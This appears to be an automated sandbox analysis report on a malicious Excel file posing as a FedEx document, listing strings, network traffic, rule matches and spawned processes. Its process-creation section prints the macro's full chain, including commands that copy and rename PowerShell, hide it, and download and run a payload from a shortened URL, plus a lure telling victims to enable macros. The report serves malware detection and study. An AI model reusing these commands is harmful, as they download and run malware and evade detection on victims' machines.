Source: o.exe, 00000010.00000002.2137518036.000000000361C000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/770629131393?
Source: o.exe, 00000010.00000002.2137518036.000000000361C000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/770629131393x
Source: o.exe, 00000010.00000003.2131250220.000000001D13E000.00000004.00000001.sdmp	String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: o.exe, 00000010.00000003.2131413940.000000001D0B9000.00000004.00000001.sdmp	String found in binary or memory: https://rca.e-szigno.hu/ocsp0-
Source: o.exe, 00000010.00000002.2137518036.000000000361C000.00000004.00000001.sdmp	String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: o.exe, 00000010.00000002.2140121697.000000001B7D5000.00000004.00000001.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: o.exe, 00000010.00000002.2132305351.00000000002FE000.00000004.00000020.sdmp	String found in binary or memory: https://secure.a-cert.at/cgi-bin/a-cert-advanced.cgi0
Source: o.exe, 00000010.00000002.2139864202.000000001B710000.00000004.00000001.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: o.exe, 00000010.00000002.2137518036.000000000361C000.00000004.00000001.sdmp	String found in binary or memory: https://tinyurl.com
Source: o.exe, 00000010.00000002.2137406124.000000000351E000.00000004.00000001.sdmp	String found in binary or memory: https://tinyurl.com/y3m5fwhq
Source: o.exe, 00000010.00000003.2131231546.000000001D12F000.00000004.00000001.sdmp	String found in binary or memory: https://www.catcert.net/verarrel
Source: o.exe, 00000010.00000003.2131231546.000000001D12F000.00000004.00000001.sdmp	String found in binary or memory: https://www.catcert.net/verarrel05
Source: o.exe, 00000010.00000002.2139864202.000000001B710000.00000004.00000001.sdmp	String found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0
Source: o.exe, 00000010.00000002.2139864202.000000001B710000.00000004.00000001.sdmp	String found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E
Source: o.exe, 00000010.00000002.2137561271.000000000365B000.00000004.00000001.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: o.exe, 00000010.00000002.2132305351.00000000002FE000.00000004.00000020.sdmp	String found in binary or memory: https://www.netlock.hu/docs/
Source: o.exe, 00000010.00000003.2131491172.000000001B7FF000.00000004.00000001.sdmp	String found in binary or memory: https://www.netlock.net/docs

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown	Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown	Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49167 -> 443

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Document image extraction number: 0	Screenshot OCR: Enable Editing" from the yellow bar and then click "Enable Content"
Source: Document image extraction number: 0	Screenshot OCR: Enable Content"
Source: Document image extraction number: 0	Screenshot OCR: Enable Editing" from the yellow bar and then click "Enable Content"
Source: Document image extraction number: 0	Screenshot OCR: Enable Content"

Found Excel 4.0 Macro with suspicious formulas

Show sources

Source: 1099008FEDEX_090887766.xls	Initial sample: EXEC
Source: 1099008FEDEX_090887766.xls	Initial sample: EXEC

Source: C:\Users\user\AppData\Roaming\vc.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\vc.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\vc.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\vc.exe	Memory allocated: 76D20000 page execute and read and write

Source: C:\Users\user\AppData\Local\Temp\o.exe	Code function: 16_2_000000013FB88DA4
Source: C:\Users\user\AppData\Local\Temp\o.exe	Code function: 16_2_000000013FB89264
Source: C:\Users\user\AppData\Local\Temp\o.exe	Code function: 16_2_000000013FB886BC
Source: C:\Users\user\AppData\Local\Temp\o.exe	Code function: 16_2_000000013FB8BB84
Source: C:\Users\user\AppData\Local\Temp\o.exe	Code function: 16_2_000000013FB879B8
Source: C:\Users\user\AppData\Local\Temp\o.exe	Code function: 16_2_000000013FB88DA4
Source: C:\Users\user\AppData\Local\Temp\o.exe	Code function: 16_2_000000013FB89264
Source: C:\Users\user\AppData\Local\Temp\o.exe	Code function: 16_2_000000013FB886BC
Source: C:\Users\user\AppData\Local\Temp\o.exe	Code function: 16_2_000000013FB8BB84
Source: C:\Users\user\AppData\Local\Temp\o.exe	Code function: 16_2_000000013FB879B8

Source: 1099008FEDEX_090887766.xls	OLE indicator, VBA macros: true
Source: 1099008FEDEX_090887766.xls	OLE indicator, VBA macros: true

Source: C:\Windows\System32\Robocopy.exe	Process token adjusted: Security
Source: C:\Windows\System32\Robocopy.exe	Process token adjusted: Security

Source: powershell.exe.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: powershell.exe.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: powershell.exe.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: powershell.exe.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: powershell.exe.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: powershell.exe.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: powershell.exe.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: powershell.exe.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: powershell.exe.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: powershell.exe.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: powershell.exe.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: powershell.exe.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: 1099008FEDEX_090887766.xls, type: SAMPLE	Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: 1099008FEDEX_090887766.xls, type: SAMPLE	Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f

Source: vc.exe.16.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: vc.exe.16.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: vc.exe.16.dr, u0006/u0006.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: vc.exe.16.dr, u0006/u0006.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: vc.exe.16.dr, u0006/u0006.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 20.0.vc.exe.fd0000.0.unpack, u0006/u0006.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 20.0.vc.exe.fd0000.0.unpack, u0006/u0006.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 20.0.vc.exe.fd0000.0.unpack, u0006/u0006.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 20.2.vc.exe.fd0000.4.unpack, u0006/u0006.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 20.2.vc.exe.fd0000.4.unpack, u0006/u0006.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 20.2.vc.exe.fd0000.4.unpack, u0006/u0006.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: vc.exe.16.dr, u0006/u0006.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: vc.exe.16.dr, u0006/u0006.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: vc.exe.16.dr, u0006/u0006.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 20.0.vc.exe.fd0000.0.unpack, u0006/u0006.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 20.0.vc.exe.fd0000.0.unpack, u0006/u0006.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 20.0.vc.exe.fd0000.0.unpack, u0006/u0006.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 20.2.vc.exe.fd0000.4.unpack, u0006/u0006.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 20.2.vc.exe.fd0000.4.unpack, u0006/u0006.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 20.2.vc.exe.fd0000.4.unpack, u0006/u0006.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: Robocopy.exe, 00000007.00000002.2109596279.0000000002130000.00000002.00000001.sdmp, o.exe, 00000010.00000002.2140328922.000000001CCD0000.00000002.00000001.sdmp	Binary or memory string: .VBPud<_
Source: Robocopy.exe, 00000007.00000002.2109596279.0000000002130000.00000002.00000001.sdmp, o.exe, 00000010.00000002.2140328922.000000001CCD0000.00000002.00000001.sdmp	Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal84.expl.evad.winXLS@25/11@2/2

Source: C:\Users\user\AppData\Local\Temp\o.exe	Code function: 16_2_000000013FB88534 FormatMessageW,GetLastError,??_V@YAXPEAX@Z,??_U@YAPEAX_K@Z,??_V@YAXPEAX@Z,LocalFree,
Source: C:\Users\user\AppData\Local\Temp\o.exe	Code function: 16_2_000000013FB88534 FormatMessageW,GetLastError,??_V@YAXPEAX@Z,??_U@YAPEAX_K@Z,??_V@YAXPEAX@Z,LocalFree,

Source: C:\Users\user\AppData\Local\Temp\o.exe	Code function: 16_2_000000013FB8AFA0 SetThreadUILanguage,CoInitialize,CoInitializeEx,CoCreateInstance,CoUninitialize,SafeArrayCreate,SysAllocString,SafeArrayPutElement,SafeArrayDestroy,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,FreeLibrary,
Source: C:\Users\user\AppData\Local\Temp\o.exe	Code function: 16_2_000000013FB8AFA0 SetThreadUILanguage,CoInitialize,CoInitializeEx,CoCreateInstance,CoUninitialize,SafeArrayCreate,SysAllocString,SafeArrayPutElement,SafeArrayDestroy,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,FreeLibrary,

Source: C:\Users\user\AppData\Local\Temp\o.exe	Code function: 16_2_000000013FB8B4C0 FindResourceExW,LoadResource,FindResourceExW,LoadResource,SetLastError,
Source: C:\Users\user\AppData\Local\Temp\o.exe	Code function: 16_2_000000013FB8B4C0 FindResourceExW,LoadResource,FindResourceExW,LoadResource,SetLastError,

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\Desktop\3BFE0000			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\Desktop\3BFE0000			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\o.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Users\user\AppData\Local\Temp\o.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Temp\CVRF3D0.tmp			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Temp\CVRF3D0.tmp			Jump to behavior

Source: 1099008FEDEX_090887766.xls	OLE indicator, Workbook stream: true
Source: 1099008FEDEX_090887766.xls	OLE indicator, Workbook stream: true

Source: C:\Windows\System32\cmd.exe	Console Write: ...................I....................................@c.I..... ........,................v............ .,.....................................
Source: C:\Windows\System32\Robocopy.exe	Console Write: .................................................................................................P.v............................................
Source: C:\Windows\System32\Robocopy.exe	Console Write: .................................................................................................P.v............................................
Source: C:\Windows\System32\Robocopy.exe	Console Write: .................................................................................................P.v............................................
Source: C:\Windows\System32\Robocopy.exe	Console Write: .................................................................................................P.v............................................
Source: C:\Windows\System32\Robocopy.exe	Console Write: .................................................................................................P.v............................................
Source: C:\Windows\System32\Robocopy.exe	Console Write: .................................. . .S.t.a.r.t.e.d. .:. .T.h.u. .N.o.v. .1.9. .0.9.:.1.9.:.5.1. .2.0.2.0.......x.......L.......................
Source: C:\Windows\System32\Robocopy.exe	Console Write: .................................. . . .S.o.u.r.c.e. .:. ........................................P.v.......M....H............... .\|.............
Source: C:\Windows\System32\Robocopy.exe	Console Write: .................................. . . . . .D.e.s.t. .:. ........................................P.v.......M....H............... .\|.............
Source: C:\Windows\System32\Robocopy.exe	Console Write: .................................................................................................P.v............................................
Source: C:\Windows\System32\Robocopy.exe	Console Write: .................................. . . . .F.i.l.e.s. .:. ........................................P.v............................G...............
Source: C:\Windows\System32\Robocopy.exe	Console Write: .................................... . . . ......p.............................. .\|......*...................................... {.............
Source: C:\Windows\System32\Robocopy.exe	Console Write: .................................................................................................P.v............................................
Source: C:\Windows\System32\Robocopy.exe	Console Write: ................................ . .O.p.t.i.o.n.s. .:. ..........................................P.v............................Q...............
Source: C:\Windows\System32\Robocopy.exe	Console Write: .................................................................................................P.v............................................
Source: C:\Windows\System32\Robocopy.exe	Console Write: .................................................................................................P.v............................................
Source: C:\Windows\System32\Robocopy.exe	Console Write: .................................................................................................P.v............................................
Source: C:\Windows\System32\Robocopy.exe	Console Write: .................................. . . . . . . . . . . . . . . . . . . .1..................................M....(.......,.................{.....
Source: C:\Windows\System32\Robocopy.exe	Console Write: .................................................................................................P.v............................................
Source: C:\Windows\System32\Robocopy.exe	Console Write: .................................. . . . .N.e.w. .F.i.l.e. . ..... . .4.7.3.6.0.0..........................M....X.......4.......................
Source: C:\Windows\System32\Robocopy.exe	Console Write: ..................................1.0.0.%. . ....P.v............................................................................d1........{.....
Source: C:\Windows\System32\Robocopy.exe	Console Write: .................................................................................................P.v............................................
Source: C:\Windows\System32\Robocopy.exe	Console Write: .................................................................................................P.v............................................
Source: C:\Windows\System32\Robocopy.exe	Console Write: .................................................................................................P.v............8...............................
Source: C:\Windows\System32\Robocopy.exe	Console Write: ........................................................................................+..M.....P.v....0.......................p'{.............
Source: C:\Windows\System32\Robocopy.exe	Console Write: .................................................................................................P.v............8...............................
Source: C:\Windows\System32\Robocopy.exe	Console Write: ........................................................................................+..M.....P.v....0.......................................
Source: C:\Windows\System32\Robocopy.exe	Console Write: .................................................................................................P.v............8...............................
Source: C:\Windows\System32\Robocopy.exe	Console Write: ........................................................................................+..M.....P.v....0.......................................
Source: C:\Windows\System32\Robocopy.exe	Console Write: .................................................................................................P.v............8...............................
Source: C:\Windows\System32\Robocopy.exe	Console Write: ........................................................................................+..M.....P.v....0.......................p...............
Source: C:\Windows\System32\Robocopy.exe	Console Write: .................................................................................................P.v............8...............................
Source: C:\Windows\System32\Robocopy.exe	Console Write: ........................................................................................+..M.....P.v....0.......................................
Source: C:\Windows\System32\Robocopy.exe	Console Write: .................................................................................................P.v............................................
Source: C:\Windows\System32\Robocopy.exe	Console Write: .................................................................................................P.v............h...............................
Source: C:\Windows\System32\Robocopy.exe	Console Write: ................................ . . .E.n.d.e.d. .:. .T.h.u. .N.o.v. .1.9. .0.9.:.1.9.:.5.1. .2.0.2.0...0...............H.......................
Source: C:\Windows\System32\timeout.exe	Console Write: ..................................W.a.i.t.i.n.g. .f.o.r. .1.....................................................................pc".............
Source: C:\Windows\System32\timeout.exe	Console Write: ................................ .s.e.c.o.n.d.s.,. .p.r.e.s.s. .a. .k.e.y. .t.o. .c.o.n.t.i.n.u.e. .....................J.......pc".......".....
Source: C:\Windows\System32\timeout.exe	Console Write: ................D.................0.............,. .p.r.........................................................................X...............
Source: C:\Windows\System32\timeout.exe	Console Write: ................D...............................,. .p.r.........................................................................X...............
Source: C:\Windows\System32\cmd.exe	Console Write: ...................I....................................@c.I..... ........,................v............ .,.....................................
Source: C:\Windows\System32\Robocopy.exe	Console Write: .................................................................................................P.v............................................
Source: C:\Windows\System32\Robocopy.exe	Console Write: .................................................................................................P.v............................................
Source: C:\Windows\System32\Robocopy.exe	Console Write: .................................................................................................P.v............................................
Source: C:\Windows\System32\Robocopy.exe	Console Write: .................................................................................................P.v............................................
Source: C:\Windows\System32\Robocopy.exe	Console Write: .................................................................................................P.v............................................
Source: C:\Windows\System32\Robocopy.exe	Console Write: .................................. . .S.t.a.r.t.e.d. .:. .T.h.u. .N.o.v. .1.9. .0.9.:.1.9.:.5.1. .2.0.2.0.......x.......L.......................
Source: C:\Windows\System32\Robocopy.exe	Console Write: .................................. . . .S.o.u.r.c.e. .:. ........................................P.v.......M....H............... .\|.............
Source: C:\Windows\System32\Robocopy.exe	Console Write: .................................. . . . . .D.e.s.t. .:. ........................................P.v.......M....H............... .\|.............
Source: C:\Windows\System32\Robocopy.exe	Console Write: .................................................................................................P.v............................................
Source: C:\Windows\System32\Robocopy.exe	Console Write: .................................. . . . .F.i.l.e.s. .:. ........................................P.v............................G...............
Source: C:\Windows\System32\Robocopy.exe	Console Write: .................................... . . . ......p.............................. .\|......*...................................... {.............
Source: C:\Windows\System32\Robocopy.exe	Console Write: .................................................................................................P.v............................................
Source: C:\Windows\System32\Robocopy.exe	Console Write: ................................ . .O.p.t.i.o.n.s. .:. ..........................................P.v............................Q...............
Source: C:\Windows\System32\Robocopy.exe	Console Write: .................................................................................................P.v............................................
Source: C:\Windows\System32\Robocopy.exe	Console Write: .................................................................................................P.v............................................
Source: C:\Windows\System32\Robocopy.exe	Console Write: .................................................................................................P.v............................................
Source: C:\Windows\System32\Robocopy.exe	Console Write: .................................. . . . . . . . . . . . . . . . . . . .1..................................M....(.......,.................{.....
Source: C:\Windows\System32\Robocopy.exe	Console Write: .................................................................................................P.v............................................
Source: C:\Windows\System32\Robocopy.exe	Console Write: .................................. . . . .N.e.w. .F.i.l.e. . ..... . .4.7.3.6.0.0..........................M....X.......4.......................
Source: C:\Windows\System32\Robocopy.exe	Console Write: ..................................1.0.0.%. . ....P.v............................................................................d1........{.....
Source: C:\Windows\System32\Robocopy.exe	Console Write: .................................................................................................P.v............................................
Source: C:\Windows\System32\Robocopy.exe	Console Write: .................................................................................................P.v............................................
Source: C:\Windows\System32\Robocopy.exe	Console Write: .................................................................................................P.v............8...............................
Source: C:\Windows\System32\Robocopy.exe	Console Write: ........................................................................................+..M.....P.v....0.......................p'{.............
Source: C:\Windows\System32\Robocopy.exe	Console Write: .................................................................................................P.v............8...............................
Source: C:\Windows\System32\Robocopy.exe	Console Write: ........................................................................................+..M.....P.v....0.......................................
Source: C:\Windows\System32\Robocopy.exe	Console Write: .................................................................................................P.v............8...............................
Source: C:\Windows\System32\Robocopy.exe	Console Write: ........................................................................................+..M.....P.v....0.......................................
Source: C:\Windows\System32\Robocopy.exe	Console Write: .................................................................................................P.v............8...............................
Source: C:\Windows\System32\Robocopy.exe	Console Write: ........................................................................................+..M.....P.v....0.......................p...............
Source: C:\Windows\System32\Robocopy.exe	Console Write: .................................................................................................P.v............8...............................
Source: C:\Windows\System32\Robocopy.exe	Console Write: ........................................................................................+..M.....P.v....0.......................................
Source: C:\Windows\System32\Robocopy.exe	Console Write: .................................................................................................P.v............................................
Source: C:\Windows\System32\Robocopy.exe	Console Write: .................................................................................................P.v............h...............................
Source: C:\Windows\System32\Robocopy.exe	Console Write: ................................ . . .E.n.d.e.d. .:. .T.h.u. .N.o.v. .1.9. .0.9.:.1.9.:.5.1. .2.0.2.0...0...............H.......................
Source: C:\Windows\System32\timeout.exe	Console Write: ..................................W.a.i.t.i.n.g. .f.o.r. .1.....................................................................pc".............
Source: C:\Windows\System32\timeout.exe	Console Write: ................................ .s.e.c.o.n.d.s.,. .p.r.e.s.s. .a. .k.e.y. .t.o. .c.o.n.t.i.n.u.e. .....................J.......pc".......".....
Source: C:\Windows\System32\timeout.exe	Console Write: ................D.................0.............,. .p.r.........................................................................X...............
Source: C:\Windows\System32\timeout.exe	Console Write: ................D...............................,. .p.r.........................................................................X...............

Source: C:\Users\user\AppData\Local\Temp\o.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\o.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\user\AppData\Local\Temp\o.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\AppData\Local\Temp\o.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\o.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\user\AppData\Local\Temp\o.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\AppData\Local\Temp\o.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\o.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\user\AppData\Local\Temp\o.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\AppData\Roaming\vc.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\vc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
Source: C:\Users\user\AppData\Roaming\vc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
Source: C:\Users\user\AppData\Local\Temp\o.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\o.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\user\AppData\Local\Temp\o.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\AppData\Local\Temp\o.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\o.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\user\AppData\Local\Temp\o.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\AppData\Local\Temp\o.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\o.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\user\AppData\Local\Temp\o.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\AppData\Roaming\vc.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\vc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
Source: C:\Users\user\AppData\Roaming\vc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File read: C:\Users\desktop.ini			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File read: C:\Users\desktop.ini			Jump to behavior

Source: C:\Windows\System32\Robocopy.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\Robocopy.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Users\user\AppData\Local\Temp\o.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: 1099008FEDEX_090887766.xls	ReversingLabs: Detection: 14%
Source: 1099008FEDEX_090887766.xls	ReversingLabs: Detection: 14%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd.exe /c robocopy %windir%\system32\WindowsPowerShell\v1.0\ %temp% powershell.exe /mt /z & exit
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c timeout /t 1 & cd %temp% & ren powershell.exe o.exe & exit
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c %temp%\o.exe -w 1 cd $env:temp; Start-Sleep 3; (get-item o.exe).Attributes += 'Hidden'
Source: unknown	Process created: C:\Windows\System32\Robocopy.exe robocopy C:\Windows\system32\WindowsPowerShell\v1.0\ C:\Users\user\AppData\Local\Temp powershell.exe /mt /z
Source: unknown	Process created: C:\Windows\System32\timeout.exe timeout /t 1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c %temp%\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c %temp%\o.exe -w 1 Start-Sleep 7; Move-Item 'vc.exe' -Destination '$env:appdata'
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c %temp%\o.exe -w 1 Start-Sleep 12; cd $env:appdata; ./vc.exe;
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\o.exe C:\Users\user\AppData\Local\Temp\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\o.exe C:\Users\user\AppData\Local\Temp\o.exe -w 1 Start-Sleep 7; Move-Item 'vc.exe' -Destination '$env:appdata'
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\o.exe C:\Users\user\AppData\Local\Temp\o.exe -w 1 Start-Sleep 12; cd $env:appdata; ./vc.exe;
Source: unknown	Process created: C:\Users\user\AppData\Roaming\vc.exe C:\Users\user\AppData\Roaming\vc.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd.exe /c robocopy %windir%\system32\WindowsPowerShell\v1.0\ %temp% powershell.exe /mt /z & exit
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c timeout /t 1 & cd %temp% & ren powershell.exe o.exe & exit
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c %temp%\o.exe -w 1 cd $env:temp; Start-Sleep 3; (get-item o.exe).Attributes += 'Hidden'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c %temp%\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c %temp%\o.exe -w 1 Start-Sleep 7; Move-Item 'vc.exe' -Destination '$env:appdata'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c %temp%\o.exe -w 1 Start-Sleep 12; cd $env:appdata; ./vc.exe;
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\Robocopy.exe robocopy C:\Windows\system32\WindowsPowerShell\v1.0\ C:\Users\user\AppData\Local\Temp powershell.exe /mt /z
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\o.exe C:\Users\user\AppData\Local\Temp\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\o.exe C:\Users\user\AppData\Local\Temp\o.exe -w 1 Start-Sleep 7; Move-Item 'vc.exe' -Destination '$env:appdata'
